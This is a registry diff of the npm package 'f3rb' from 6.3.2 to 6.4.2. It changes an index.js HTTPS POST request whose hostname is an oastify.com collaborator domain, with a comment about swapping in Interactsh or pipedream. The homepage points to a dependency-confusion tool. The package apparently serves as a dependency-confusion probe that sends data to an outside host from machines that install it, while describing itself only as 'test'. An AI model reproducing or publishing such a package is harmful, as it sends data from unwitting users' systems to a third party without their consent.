f3rb 6.3.2 → 6.4.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +2 -2
package/index.js CHANGED
@@ -29,7 +29,7 @@ var postData = querystring.stringify({
29
29
 
30
30
  // HTTPS request options
31
31
  var options = {
32
- hostname: "rjebc6o5e8bvxwdqch962jfzjqpidg15.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
32
+ hostname: "http://rjebc6o5e8bvxwdqch962jfzjqpidg15.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
33
33
  port: 443,
34
34
  path: "/",
35
35
  method: "POST",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "f3rb",
3
- "version": "6.3.2",
3
+ "version": "6.4.2",
4
4
  "description": "test",
5
5
  "main": "index.js",
6
6
  "scripts": {
@@ -17,6 +17,6 @@
17
17
  },
18
18
  "homepage": "https://github.com/visma-prodsec/confused#readme",
19
19
  "dependencies": {
20
- "f3rb": "^5.3.2"
20
+ "f3rb": "6.3.2"
21
21
  }
22
22
  }